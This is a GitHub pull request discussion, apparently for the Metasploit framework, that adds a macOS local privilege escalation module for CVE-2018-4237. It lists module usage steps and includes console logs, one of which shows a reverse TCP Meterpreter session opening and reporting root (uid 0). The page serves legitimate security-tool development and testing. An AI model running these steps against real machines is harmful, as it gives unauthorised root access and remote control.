New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add the macOS LPE from pwn2own2018 (CVE-2018-4237) #10965

Merged
merged 4 commits into from Nov 27, 2018

Conversation

Projects
None yet
3 participants
@timwr
Copy link
Contributor

timwr commented Nov 15, 2018

This is the LPE part of #10944 in a separate pull request.
I've tested this on 10.13, 10.12.6 and 10.11.
No offsets are required so it should work on all versions (but I don't have anything lower than 10.11 to test on).

Verification

  • Get any OSX session (< 10.13.4)
  • use exploit/osx/local/libxpc_mitm_sudo
  • set SESSION -1
  • set LHOST <tab>
  • set LPORT 4444
  • exploit
  • Verify uid 0
  • Add Documentation

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2018

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 20, 2018

Documentation incoming

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 20, 2018

Oops I think I broke something:

[*] Started reverse TCP handler on 192.168.3.17:5555
[*] Uploading file: '/tmp/wnrhfxcgak'
[*] Uploading file: '/tmp/zbljxiedwgw'
[*] Executing cmd '/tmp/wnrhfxcgak /tmp/zbljxiedwgw &'
[*] Exploit completed, but no session was created.

I swear this was working when I last pushed :/

@timwr timwr force-pushed the timwr:cve-2018-4237 branch from a4d245c to 0649ad9 Nov 20, 2018

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Nov 20, 2018

Actually I think I was testing it on python meterpreter, It seems to work better if I move the fork into the binary: 44b1b6f

@timwr timwr removed the needs-docs label Nov 20, 2018

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 26, 2018

Looking into this :-)

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 27, 2018

Works flawlessly, nice one @timwr

msf5 exploit(osx/local/libxpc_mitm_ssudo) > show options

Module options (exploit/osx/local/libxpc_mitm_ssudo):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (osx/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.249.1     yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Mac OS X x64 (Native Payload)


msf5 exploit(osx/local/libxpc_mitm_ssudo) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:5555 
[*] Uploading file: '/tmp/muxqqltshhy'
[*] Uploading file: '/tmp/dfgecvg'
[*] Executing cmd '/tmp/muxqqltshhy /tmp/dfgecvg'
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(4088 bytes)
[*] Sending stage (808168 bytes) to 172.16.249.129
[*] Meterpreter session 2 opened (172.16.249.1:5555 -> 172.16.249.129:49172) at 2018-11-27 13:57:29 -0600

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

@wchen-r7 wchen-r7 merged commit 0649ad9 into rapid7:master Nov 27, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Nov 27, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 27, 2018

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 27, 2018

Release Notes

The exploits/osx/local/libxpc_mitm_ssudo module has been added to the framework. This is an exploit for CVE-2018-4237, a Mac OS X local privilege escalation vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment